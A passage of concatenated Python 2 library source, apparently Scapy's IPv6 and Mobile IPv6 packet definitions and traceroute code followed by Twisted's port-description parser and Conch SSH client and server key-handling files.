# in seconds relative to 0h on 1 January 1900. The integer part is in the
# first 32 bits and the fraction part in the last 32 bits.
class NTPTimestampField(LongField):
epoch = (1900, 1, 1, 0, 0, 0, 5, 1, 0)
def i2repr(self, pkt, x):
if x < ((50*31536000)<<32):
return "Some date a few decades ago (%d)" % x
# delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to
# January 1st 1970 :
delta = -2209075761
i = int(x >> 32)
j = float(x & 0xffffffff) * 2.0**-32
res = i + j + delta
from time import strftime
t = time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime(res))
return "%s (%d)" % (t, x)
class MIP6OptReplayProtection(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 6)
name = "MIPv6 option - Replay Protection"
fields_desc = [ ByteEnumField("otype", 10, _mobopttypes),
ByteField("olen", 8),
NTPTimestampField("timestamp", 0) ]
x = 8 ; y = 2 # alignment requirement: 8n+2
class MIP6OptCGAParamsReq(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.6)
name = "MIPv6 option - CGA Parameters Request"
fields_desc = [ ByteEnumField("otype", 11, _mobopttypes),
ByteField("olen", 0) ]
x = 0 ; y = 0 # alignment requirement: none
# XXX TODO: deal with CGA param fragmentation and build of defragmented
# XXX version. Passing of a big CGAParam structure should be
# XXX simplified. Make it hold packets, by the way --arno
class MIP6OptCGAParams(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.1)
name = "MIPv6 option - CGA Parameters"
fields_desc = [ ByteEnumField("otype", 12, _mobopttypes),
FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
StrLenField("cgaparams", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptSignature(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.2)
name = "MIPv6 option - Signature"
fields_desc = [ ByteEnumField("otype", 13, _mobopttypes),
FieldLenField("olen", None, length_of="sig", fmt="B"),
StrLenField("sig", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptHomeKeygenToken(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.3)
name = "MIPv6 option - Home Keygen Token"
fields_desc = [ ByteEnumField("otype", 14, _mobopttypes),
FieldLenField("olen", None, length_of="hkt", fmt="B"),
StrLenField("hkt", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptCareOfTestInit(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.4)
name = "MIPv6 option - Care-of Test Init"
fields_desc = [ ByteEnumField("otype", 15, _mobopttypes),
ByteField("olen", 0) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptCareOfTest(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.5)
name = "MIPv6 option - Care-of Test"
fields_desc = [ ByteEnumField("otype", 16, _mobopttypes),
FieldLenField("olen", None, length_of="cokt", fmt="B"),
StrLenField("cokt", '\x00'*8,
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptUnknown(_MIP6OptAlign, Packet):
name = 'Scapy6 - Unknown Mobility Option'
fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
FieldLenField("olen", None, length_of="odata", fmt="B"),
StrLenField("odata", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
moboptcls = { 0: Pad1,
1: PadN,
2: MIP6OptBRAdvice,
3: MIP6OptAltCoA,
4: MIP6OptNonceIndices,
5: MIP6OptBindingAuthData,
6: MIP6OptMobNetPrefix,
7: MIP6OptLLAddr,
8: MIP6OptMNID,
9: MIP6OptMsgAuth,
10: MIP6OptReplayProtection,
11: MIP6OptCGAParamsReq,
12: MIP6OptCGAParams,
13: MIP6OptSignature,
14: MIP6OptHomeKeygenToken,
15: MIP6OptCareOfTestInit,
16: MIP6OptCareOfTest }
# Main Mobile IPv6 Classes
mhtypes = { 0: 'BRR',
1: 'HoTI',
2: 'CoTI',
3: 'HoT',
4: 'CoT',
5: 'BU',
6: 'BA',
7: 'BE',
8: 'Fast BU',
9: 'Fast BA',
10: 'Fast NA' }
# From http://www.iana.org/assignments/mobility-parameters
bastatus = { 0: 'Binding Update accepted',
1: 'Accepted but prefix discovery necessary',
128: 'Reason unspecified',
129: 'Administratively prohibited',
130: 'Insufficient resources',
131: 'Home registration not supported',
132: 'Not home subnet',
133: 'Not home agent for this mobile node',
134: 'Duplicate Address Detection failed',
135: 'Sequence number out of window',
136: 'Expired home nonce index',
137: 'Expired care-of nonce index',
138: 'Expired nonces',
139: 'Registration type change disallowed',
140: 'Mobile Router Operation not permitted',
141: 'Invalid Prefix',
142: 'Not Authorized for Prefix',
143: 'Forwarding Setup failed (prefixes missing)',
144: 'MIPV6-ID-MISMATCH',
145: 'MIPV6-MESG-ID-REQD',
146: 'MIPV6-AUTH-FAIL',
147: 'Permanent home keygen token unavailable',
148: 'CGA and signature verification failed',
149: 'Permanent home keygen token exists',
150: 'Non-null home nonce index expected' }
class _MobilityHeader(Packet):
name = 'Dummy IPv6 Mobility Header'
overload_fields = { IPv6: { "nh": 135 }}
def post_build(self, p, pay):
p += pay
l = self.len
if self.len is None:
l = (len(p)-8)/8
p = p[0] + struct.pack("B", l) + p[2:]
if self.cksum is None:
cksum = in6_chksum(135, self.underlayer, p)
else:
cksum = self.cksum
p = p[:4]+struct.pack("!H", cksum)+p[6:]
return p
class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg
name = "IPv6 Mobility Header - Generic Message"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", None, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrLenField("msg", "\x00"*2,
length_from = lambda pkt: 8*pkt.len-6) ]
# TODO: make a generic _OptionsField
class _MobilityOptionsField(PacketListField):
islist = 1
holds_packet = 1
def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
self.curpos = curpos
PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
def getfield(self, pkt, s):
l = self.length_from(pkt)
return s[l:],self.m2i(pkt, s[:l])
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
def m2i(self, pkt, x):
opt = []
while x:
o = ord(x[0]) # Option type
cls = self.cls
if moboptcls.has_key(o):
cls = moboptcls[o]
try:
op = cls(x)
except:
op = self.cls(x)
opt.append(op)
if isinstance(op.payload, conf.raw_layer):
x = op.payload.load
del(op.payload)
else:
x = ""
return opt
def i2m(self, pkt, x):
autopad = None
try:
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
except:
autopad = 1
if not autopad:
return "".join(map(str, x))
curpos = self.curpos
s = ""
for p in x:
d = p.alignment_delta(curpos)
curpos += d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
pstr = str(p)
curpos += len(pstr)
s += pstr
# Let's make the class including our option field
# a multiple of 8 octets long
d = curpos % 8
if d == 0:
return s
d = 8 - d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
return s
def addfield(self, pkt, s, val):
return s+self.i2m(pkt, val)
class MIP6MH_BRR(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Refresh Request"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 0, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("res2", None),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 8,
length_from = lambda pkt: 8*pkt.len) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
# Hack: BRR, BU and BA have the same hashret that returns the same
# value "\x00\x08\x09" (concatenation of mhtypes). This is
# because we need match BA with BU and BU with BRR. --arno
return "\x00\x08\x09"
class MIP6MH_HoTI(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test Init"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 1, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrFixedLenField("reserved", "\x00"*2, 2),
StrFixedLenField("cookie", "\x00"*8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 16,
length_from = lambda pkt: 8*(pkt.len-1)) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
return self.cookie
class MIP6MH_CoTI(MIP6MH_HoTI):
name = "IPv6 Mobility Header - Care-of Test Init"
mhtype = 2
def hashret(self):
return self.cookie
class MIP6MH_HoT(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 3, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("index", None),
StrFixedLenField("cookie", "\x00"*8, 8),
StrFixedLenField("token", "\x00"*8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 24,
length_from = lambda pkt: 8*(pkt.len-2)) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
return self.cookie
def answers(self):
if (isinstance(other, MIP6MH_HoTI) and
self.cookie == other.cookie):
return 1
return 0
class MIP6MH_CoT(MIP6MH_HoT):
name = "IPv6 Mobility Header - Care-of Test"
mhtype = 4
def hashret(self):
return self.cookie
def answers(self):
if (isinstance(other, MIP6MH_CoTI) and
self.cookie == other.cookie):
return 1
return 0
class LifetimeField(ShortField):
def i2repr(self, pkt, x):
return "%d sec" % (4*x)
class MIP6MH_BU(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Update"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 5, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
XShortField("seq", None), # TODO: ShortNonceField
FlagsField("flags", "KHA", 7, "PRMKLHA"),
XBitField("reserved", 0, 9),
LifetimeField("mhtime", 3), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 12,
length_from = lambda pkt: 8*pkt.len - 4) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return "\x00\x08\x09"
def answers(self, other):
if isinstance(other, MIP6MH_BRR):
return 1
return 0
class MIP6MH_BA(_MobilityHeader):
name = "IPv6 Mobility Header - Binding ACK"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 6, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ByteEnumField("status", 0, bastatus),
FlagsField("flags", "K", 3, "PRK"),
XBitField("res2", None, 5),
XShortField("seq", None), # TODO: ShortNonceField
XShortField("mhtime", 0), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 12,
length_from = lambda pkt: 8*pkt.len-4) ]
overload_fields = { IPv6: { "nh": 135 }}
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return "\x00\x08\x09"
def answers(self, other):
if (isinstance(other, MIP6MH_BU) and
other.mhtype == 5 and
self.mhtype == 6 and
other.flags & 0x1 and # Ack request flags is set
self.seq == other.seq):
return 1
return 0
_bestatus = { 1: 'Unknown binding for Home Address destination option',
2: 'Unrecognized MH Type value' }
# TODO: match Binding Error to its stimulus
class MIP6MH_BE(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Error"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 7, mhtypes),
ByteField("res", 0),
XShortField("cksum", None),
ByteEnumField("status", 0, _bestatus),
ByteField("reserved", 0),
IP6Field("ha", "::"),
_MobilityOptionsField("options", [], MIP6OptUnknown, 24,
length_from = lambda pkt: 8*(pkt.len-2)) ]
overload_fields = { IPv6: { "nh": 135 }}
_mip6_mhtype2cls = { 0: MIP6MH_BRR,
1: MIP6MH_HoTI,
2: MIP6MH_CoTI,
3: MIP6MH_HoT,
4: MIP6MH_CoT,
5: MIP6MH_BU,
6: MIP6MH_BA,
7: MIP6MH_BE }
#############################################################################
#############################################################################
### Traceroute6 ###
#############################################################################
#############################################################################
class AS_resolver6(AS_resolver_riswhois):
def _resolve_one(self, ip):
"""
overloaded version to provide a Whois resolution on the
embedded IPv4 address if the address is 6to4 or Teredo.
Otherwise, the native IPv6 address is passed.
"""
if in6_isaddr6to4(ip): # for 6to4, use embedded @
tmp = inet_pton(socket.AF_INET6, ip)
addr = inet_ntop(socket.AF_INET, tmp[2:6])
elif in6_isaddrTeredo(ip): # for Teredo, use mapped address
addr = teredoAddrExtractInfo(ip)[2]
else:
addr = ip
_, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)
return ip,asn,desc
class TracerouteResult6(TracerouteResult):
def show(self):
return self.make_table(lambda (s,r): (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 !
s.hlim,
r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}"+
"{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}"+
"{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}"+
"{ICMPv6EchoReply:%ir,type%}")))
def get_trace(self):
trace = {}
for s,r in self.res:
if IPv6 not in s:
continue
d = s[IPv6].dst
if d not in trace:
trace[d] = {}
t = not (ICMPv6TimeExceeded in r or
ICMPv6DestUnreach in r or
ICMPv6PacketTooBig in r or
ICMPv6ParamProblem in r)
trace[d][s[IPv6].hlim] = r[IPv6].src, t
for k in trace.values():
m = filter(lambda x: k[x][1], k.keys())
if not m:
continue
m = min(m)
for l in k.keys():
if l > m:
del(k[l])
return trace
def graph(self, ASres=AS_resolver6(), **kargs):
TracerouteResult.graph(self, ASres=ASres, **kargs)
def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
l4 = None, timeout=2, verbose=None, **kargs):
"""
Instant TCP traceroute using IPv6 :
traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None
"""
if verbose is None:
verbose = conf.verb
if l4 is None:
a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/TCP(seq=RandInt(),sport=sport, dport=dport),
timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs)
else:
a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/l4,
timeout=timeout, verbose=verbose, **kargs)
a = TracerouteResult6(a.res)
if verbose:
a.display()
return a,b
#############################################################################
#############################################################################
### Sockets ###
#############################################################################
#############################################################################
class L3RawSocket6(L3RawSocket):
def __init__(self, type = ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0):
L3RawSocket.__init__(self, type, filter, iface, promisc)
# NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292)
self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)
self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))
def IPv6inIP(dst='192.168.127.12', src=None):
_IPv6inIP.dst = dst
_IPv6inIP.src = src
if not conf.L3socket == _IPv6inIP:
_IPv6inIP.cls = conf.L3socket
else:
del(conf.L3socket)
return _IPv6inIP
class _IPv6inIP(SuperSocket):
dst = '127.0.0.1'
src = None
cls = None
def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args):
SuperSocket.__init__(self, family, type, proto)
self.worker = self.cls(**args)
def set(self, dst, src=None):
_IPv6inIP.src = src
_IPv6inIP.dst = dst
def nonblock_recv(self):
p = self.worker.nonblock_recv()
return self._recv(p)
def recv(self, x):
p = self.worker.recv(x)
return self._recv(p, x)
def _recv(self, p, x=MTU):
if p is None:
return p
elif isinstance(p, IP):
# TODO: verify checksum
if p.src == self.dst and p.proto == socket.IPPROTO_IPV6:
if isinstance(p.payload, IPv6):
return p.payload
return p
def send(self, x):
return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)/x)
#############################################################################
#############################################################################
### Layers binding ###
#############################################################################
#############################################################################
conf.l3types.register(ETH_P_IPV6, IPv6)
conf.l2types.register(31, IPv6)
bind_layers(Ether, IPv6, type = 0x86dd )
bind_layers(CookedLinux, IPv6, proto = 0x86dd )
bind_layers(IPerror6, TCPerror, nh = socket.IPPROTO_TCP )
bind_layers(IPerror6, UDPerror, nh = socket.IPPROTO_UDP )
bind_layers(IPv6, TCP, nh = socket.IPPROTO_TCP )
bind_layers(IPv6, UDP, nh = socket.IPPROTO_UDP )
bind_layers(IP, IPv6, proto = socket.IPPROTO_IPV6 )
bind_layers(IPv6, IPv6, nh = socket.IPPROTO_IPV6 )
bind_layers(IPv6, IP, nh = socket.IPPROTO_IPIP )
```
#### File: twisted/application/strports.py
```python
from __future__ import generators
def _parseTCP(factory, port, interface="", backlog=50):
return (int(port), factory), {'interface': interface,
'backlog': int(backlog)}
def _parseUNIX(factory, address, mode='666', backlog=50):
return (address, factory), {'mode': int(mode, 8), 'backlog': int(backlog)}
def _parseSSL(factory, port, privateKey="server.pem", certKey=None,
sslmethod=None, interface='', backlog=50):
from twisted.internet import ssl
if certKey is None:
certKey = privateKey
kw = {}
if sslmethod is not None:
kw['sslmethod'] = getattr(ssl.SSL, sslmethod)
cf = ssl.DefaultOpenSSLContextFactory(privateKey, certKey, **kw)
return ((int(port), factory, cf),
{'interface': interface, 'backlog': int(backlog)})
_funcs = {"tcp": _parseTCP,
"unix": _parseUNIX,
"ssl": _parseSSL}
_OP, _STRING = range(2)
def _tokenize(description):
current = ''
ops = ':='
nextOps = {':': ':=', '=': ':'}
description = iter(description)
for n in description:
if n in ops:
yield _STRING, current
yield _OP, n
current = ''
ops = nextOps[n]
elif n=='\\':
current += description.next()
else:
current += n
yield _STRING, current
def _parse(description):
args, kw = [], {}
def add(sofar):
if len(sofar)==1:
args.append(sofar[0])
else:
kw[sofar[0]] = sofar[1]
sofar = ()
for (type, value) in _tokenize(description):
if type is _STRING:
sofar += (value,)
elif value==':':
add(sofar)
sofar = ()
add(sofar)
return args, kw
def parse(description, factory, default=None):
"""
Parse the description of a reliable virtual circuit server (that is, a
TCP port, a UNIX domain socket or an SSL port) and return the data
necessary to call the reactor methods to listen on the given socket with
the given factory.
An argument with no colons means a default port. Usually the default
type is C{tcp}, but passing a non-C{None} value as C{default} will set
that as the default. Otherwise, it is a colon-separated string. The
first part means the type -- currently, it can only be ssl, unix or tcp.
After that, comes a list of arguments. Arguments can be positional or
keyword, and can be mixed. Keyword arguments are indicated by
C{'name=value'}. If a value is supposed to contain a C{':'}, a C{'='} or
a C{'\\'}, escape it with a C{'\\'}.
For TCP, the arguments are the port (port number) and, optionally the
interface (interface on which to listen) and backlog (how many clients
to keep in the backlog).
For UNIX domain sockets, the arguments are address (the file name of the
socket) and optionally the mode (the mode bits of the file, as an octal
number) and the backlog (how many clients to keep in the backlog).
For SSL sockets, the arguments are the port (port number) and,
optionally, the privateKey (file in which the private key is in),
certKey (file in which the certification is in), sslmethod (the name of
the SSL method to allow), the interface (interface on which to listen)
and the backlog (how many clients to keep in the backlog).
@type description: C{str}
@type factory: L{twisted.internet.interfaces.IProtocolFactory}
@type default: C{str} or C{None}
@rtype: C{tuple}
@return: a tuple of string, tuple and dictionary. The string is the name
of the method (sans C{'listen'}) to call, and the tuple and dictionary
are the arguments and keyword arguments to the method.
@raises ValueError: if the string is formatted incorrectly.
@raises KeyError: if the type is other than unix, ssl or tcp.
"""
args, kw = _parse(description)
if not args or (len(args)==1 and not kw):
args[0:0] = [default or 'tcp']
return (args[0].upper(),)+_funcs[args[0]](factory, *args[1:], **kw)
def service(description, factory, default=None):
"""Return the service corresponding to a description
@type description: C{str}
@type factory: L{twisted.internet.interfaces.IProtocolFactory}
@type default: C{str} or C{None}
@rtype: C{twisted.application.service.IService}
@return: the service corresponding to a description of a reliable
virtual circuit server.
See the documentation of the C{parse} function for description
of the semantics of the arguments.
"""
from twisted.application import internet
name, args, kw = parse(description, factory, default)
return getattr(internet, name+'Server')(*args, **kw)
def listen(description, factory, default=None):
"""Listen on a port corresponding to a description
@type description: C{str}
@type factory: L{twisted.internet.interfaces.IProtocolFactory}
@type default: C{str} or C{None}
@rtype: C{twisted.internet.interfaces.IListeningPort}
@return: the port corresponding to a description of a reliable
virtual circuit server.
See the documentation of the C{parse} function for description
of the semantics of the arguments.
"""
from twisted.internet import reactor
name, args, kw = parse(description, factory, default)
return getattr(reactor, 'listen'+name)(*args, **kw)
__all__ = ['parse', 'service', 'listen']
```
#### File: conch/client/default.py
```python
from twisted.conch.error import ConchError
from twisted.conch.ssh import common, keys, userauth, agent
from twisted.internet import defer, protocol, reactor
from twisted.python import log
import agent
import os, sys, base64, getpass
def verifyHostKey(transport, host, pubKey, fingerprint):
goodKey = isInKnownHosts(host, pubKey, transport.factory.options)
if goodKey == 1: # good key
return defer.succeed(1)
elif goodKey == 2: # AAHHHHH changed
return defer.fail(ConchError('changed host key'))
else:
oldout, oldin = sys.stdout, sys.stdin
sys.stdin = sys.stdout = open('/dev/tty','r+')
if host == transport.transport.getPeer().host:
khHost = host
else:
host = '%s (%s)' % (host,
transport.transport.getPeer().host)
khHost = '%s,%s' % (host,
transport.transport.getPeer().host)
keyType = common.getNS(pubKey)[0]
print """The authenticity of host '%s' can't be established.
%s key fingerprint is %s.""" % (host,
{'ssh-dss':'DSA', 'ssh-rsa':'RSA'}[keyType],
fingerprint)
try:
ans = raw_input('Are you sure you want to continue connecting (yes/no)? ')
except KeyboardInterrupt:
return defer.fail(ConchError("^C"))
while ans.lower() not in ('yes', 'no'):
ans = raw_input("Please type 'yes' or 'no': ")
sys.stdout,sys.stdin=oldout,oldin
if ans == 'no':
print 'Host key verification failed.'
return defer.fail(ConchError('bad host key'))
print "Warning: Permanently added '%s' (%s) to the list of known hosts." % (khHost, {'ssh-dss':'DSA', 'ssh-rsa':'RSA'}[keyType])
known_hosts = open(os.path.expanduser('~/.ssh/known_hosts'), 'r+')
known_hosts.seek(-1, 2)
if known_hosts.read(1) != '\n':
known_hosts.write('\n')
encodedKey = base64.encodestring(pubKey).replace('\n', '')
known_hosts.write('%s %s %s\n' % (khHost, keyType, encodedKey))
known_hosts.close()
return defer.succeed(1)
def isInKnownHosts(host, pubKey, options):
"""checks to see if host is in the known_hosts file for the user.
returns 0 if it isn't, 1 if it is and is the same, 2 if it's changed.
"""
keyType = common.getNS(pubKey)[0]
retVal = 0
if not options['known-hosts'] and not os.path.exists(os.path.expanduser('~/.ssh/')):
print 'Creating ~/.ssh directory...'
os.mkdir(os.path.expanduser('~/.ssh'))
kh_file = options['known-hosts'] or '~/.ssh/known_hosts'
try:
known_hosts = open(os.path.expanduser(kh_file))
except IOError:
return 0
for line in known_hosts.xreadlines():
split = line.split()
if len(split) < 3:
continue
hosts, hostKeyType, encodedKey = split[:3]
if host not in hosts.split(','): # incorrect host
continue
if hostKeyType != keyType: # incorrect type of key
continue
try:
decodedKey = base64.decodestring(encodedKey)
except:
continue
if decodedKey == pubKey:
return 1
else:
retVal = 2
return retVal
class SSHUserAuthClient(userauth.SSHUserAuthClient):
def __init__(self, user, options, *args):
userauth.SSHUserAuthClient.__init__(self, user, *args)
self.keyAgent = None
self.options = options
self.usedFiles = []
if not options.identitys:
options.identitys = ['~/.ssh/id_rsa', '~/.ssh/id_dsa']
def serviceStarted(self):
if 'SSH_AUTH_SOCK' in os.environ and not self.options['noagent']:
log.msg('using agent')
cc = protocol.ClientCreator(reactor, agent.SSHAgentClient)
d = cc.connectUNIX(os.environ['SSH_AUTH_SOCK'])
d.addCallback(self._setAgent)
d.addErrback(self._ebSetAgent)
else:
userauth.SSHUserAuthClient.serviceStarted(self)
def serviceStopped(self):
if self.keyAgent:
self.keyAgent.transport.loseConnection()
self.keyAgent = None
def _setAgent(self, a):
self.keyAgent = a
d = self.keyAgent.getPublicKeys()
d.addBoth(self._ebSetAgent)
return d
def _ebSetAgent(self, f):
userauth.SSHUserAuthClient.serviceStarted(self)
def _getPassword(self, prompt):
try:
oldout, oldin = sys.stdout, sys.stdin
sys.stdin = sys.stdout = open('/dev/tty','r+')
p=getpass.getpass(prompt)
sys.stdout,sys.stdin=oldout,oldin
return p
except (KeyboardInterrupt, IOError):
print
raise ConchError('PEBKAC')
def getPassword(self, prompt = None):
if not prompt:
prompt = "%s@%s's password: " % (self.user, self.transport.transport.getPeer().host)
try:
p = self._getPassword(prompt)
return defer.succeed(p)
except ConchError:
return defer.fail()
def getPublicKey(self):
if self.keyAgent:
blob = self.keyAgent.getPublicKey()
if blob:
return blob
files = [x for x in self.options.identitys if x not in self.usedFiles]
log.msg(str(self.options.identitys))
log.msg(str(files))
if not files:
return None
file = files[0]
log.msg(file)
self.usedFiles.append(file)
file = os.path.expanduser(file)
file += '.pub'
if not os.path.exists(file):
return self.getPublicKey() # try again
try:
return keys.getPublicKeyString(file)
except:
return self.getPublicKey() # try again
def signData(self, publicKey, signData):
if not self.usedFiles: # agent key
return self.keyAgent.signData(publicKey, signData)
else:
return userauth.SSHUserAuthClient.signData(self, publicKey, signData)
def getPrivateKey(self):
file = os.path.expanduser(self.usedFiles[-1])
if not os.path.exists(file):
return None
try:
return defer.succeed(keys.getPrivateKeyObject(file))
except keys.BadKeyError, e:
if e.args[0] == 'encrypted key with no passphrase':
for i in range(3):
prompt = "Enter passphrase for key '%s': " % \
self.usedFiles[-1]
try:
p = self._getPassword(prompt)
return defer.succeed(keys.getPrivateKeyObject(file, passphrase = p))
except (keys.BadKeyError, ConchError):
pass
return defer.fail(ConchError('bad password'))
raise
except KeyboardInterrupt:
print
reactor.stop()
def getGenericAnswers(self, name, instruction, prompts):
responses = []
try:
oldout, oldin = sys.stdout, sys.stdin
sys.stdin = sys.stdout = open('/dev/tty','r+')
if name:
print name
if instruction:
print instruction
for prompt, echo in prompts:
if echo:
responses.append(raw_input(prompt))
else:
responses.append(getpass.getpass(prompt))
finally:
sys.stdout,sys.stdin=oldout,oldin
return defer.succeed(responses)
```
#### File: conch/openssh_compat/factory.py
```python
from twisted.conch.ssh import keys, factory, common
from twisted.python import log
import primes
import os
class OpenSSHFactory(factory.SSHFactory):
dataRoot = '/usr/local/etc'
moduliRoot = '/usr/local/etc' # for openbsd which puts moduli in a different
# directory from keys
def getPublicKeys(self):
ks = {}
for file in os.listdir(self.dataRoot):
if file[:9] == 'ssh_host_' and file[-8:]=='_key.pub':
try:
k = keys.getPublicKeyString(self.dataRoot+'/'+file)
t = common.getNS(k)[0]
ks[t] = k
except Exception, e:
log.msg('bad public key file %s: %s' % (file,e))
return ks
def getPrivateKeys(self):
ks = {}
euid,egid = os.geteuid(), os.getegid()
os.setegid(0) # gain priviledges
os.seteuid(0)
for file in os.listdir(self.dataRoot):
if file[:9] == 'ssh_host_' and file[-4:]=='_key':
try:
k = keys.getPrivateKeyObject(self.dataRoot+'/'+file)
t = keys.objectType(k)
ks[t] = k
except Exception, e:
log.msg('bad private key file %s: %s' % (file, e))
os.setegid(egid) # drop them just as quickily
os.seteuid(euid)
return ks
def getPrimes(self):
try:
return primes.parseModuliFile(self.moduliRoot+'/moduli')
except IOError:
return None
```
#### File: conch/ssh/factory.py
```python
import md5
try:
import resource
except ImportError:
resource = None
from twisted.internet import protocol
from twisted.python import log
from twisted.conch import error
import transport, userauth, connection
import random
class SSHFactory(protocol.Factory):
services = {
'ssh-userauth':userauth.SSHUserAuthServer,
'ssh-connection':connection.SSHConnection
}
def startFactory(self):
# disable coredumps
if resource:
resource.setrlimit(resource.RLIMIT_CORE, (0,0))
else:
log.msg('INSECURE: unable to disable core dumps.')
if not hasattr(self,'publicKeys'):
self.publicKeys = self.getPublicKeys()
if not hasattr(self,'privateKeys'):
self.privateKeys = self.getPrivateKeys()
if not self.publicKeys or not self.privateKeys:
raise error.ConchError('no host keys, failing')
if not hasattr(self,'primes'):
self.primes = self.getPrimes()
#if not self.primes:
# log.msg('disabling diffie-hellman-group-exchange because we cannot find moduli file')
# transport.SSHServerTransport.supportedKeyExchanges.remove('diffie-hellman-group-exchange-sha1')
if self.primes:
self.primesKeys = self.primes.keys()
def buildProtocol(self, addr):
t = transport.SSHServerTransport()
t.supportedPublicKeys = self.privateKeys.keys()
if not self.primes:
ske = t.supportedKeyExchanges[:]
ske.remove('diffie-hellman-group-exchange-sha1')
t.supportedKeyExchanges = ske
t.factory = self
return t
def getPublicKeys(self):
"""
Called when the factory is started to get the public portions of the
servers host keys. Returns a dictionary mapping SSH key types to
public key strings.
@rtype: C{dict}
"""
raise NotImplementedError
def getPrivateKeys(self):
"""
Called when the factory is started to get the private portions of the
servers host keys. Returns a dictionary mapping SSH key types to
C{Crypto.PublicKey.pubkey.pubkey} objects.
@rtype: C{dict}
"""
raise NotImplementedError
def getPrimes(self):
"""
Called when the factory is started to get Diffie-Hellman generators and
primes to use. Returns a dictionary mapping number of bits to lists
of tuple of (generator, prime).
@rtype: C{dict}
"""
def getDHPrime(self, bits):
"""
Return a tuple of (g, p) for a Diffe-Hellman process, with p being as
close to bits bits as possible.
@type bits: C{int}
@rtype: C{tuple}
"""
self.primesKeys.sort(lambda x,y,b=bits:cmp(abs(x-b), abs(x-b)))
realBits = self.primesKeys[0]
return random.choice(self.primes[realBits])
def getService(self, transport, service):
"""
